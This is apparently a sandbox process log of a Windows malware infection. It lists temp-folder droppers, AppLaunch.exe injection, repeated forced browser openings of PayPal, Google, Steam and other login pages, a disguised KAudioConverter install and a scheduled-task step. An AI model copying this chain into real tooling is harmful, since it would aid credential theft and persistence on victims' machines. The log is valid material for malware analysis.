"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,12972383147552689299,2052112521647140496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x144,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\13A2.exe

C:\Users\Admin\AppData\Local\Temp\13A2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe

C:\Users\Admin\AppData\Local\Temp\14CC.exe

C:\Users\Admin\AppData\Local\Temp\14CC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1644.bat" "

C:\Users\Admin\AppData\Local\Temp\176E.exe

C:\Users\Admin\AppData\Local\Temp\176E.exe

C:\Users\Admin\AppData\Local\Temp\1888.exe

C:\Users\Admin\AppData\Local\Temp\1888.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\1B68.exe

C:\Users\Admin\AppData\Local\Temp\1B68.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6196 -ip 6196

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\2348.exe

C:\Users\Admin\AppData\Local\Temp\2348.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5896 -ip 5896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=9548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9612 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x308 0x46c

C:\Users\Admin\AppData\Local\Temp\4894.exe

C:\Users\Admin\AppData\Local\Temp\4894.exe

C:\Users\Admin\AppData\Local\Temp\4B74.exe

C:\Users\Admin\AppData\Local\Temp\4B74.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-57ARK.tmp\LzmwAqmV.tmp" /SL5="$100192,3039358,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\670B.exe

C:\Users\Admin\AppData\Local\Temp\670B.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -s

C:\Users\Admin\AppData\Local\Temp\6E01.exe

C:\Users\Admin\AppData\Local\Temp\6E01.exe

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -i

C:\Windows\SysWOW64\schtasks.exe

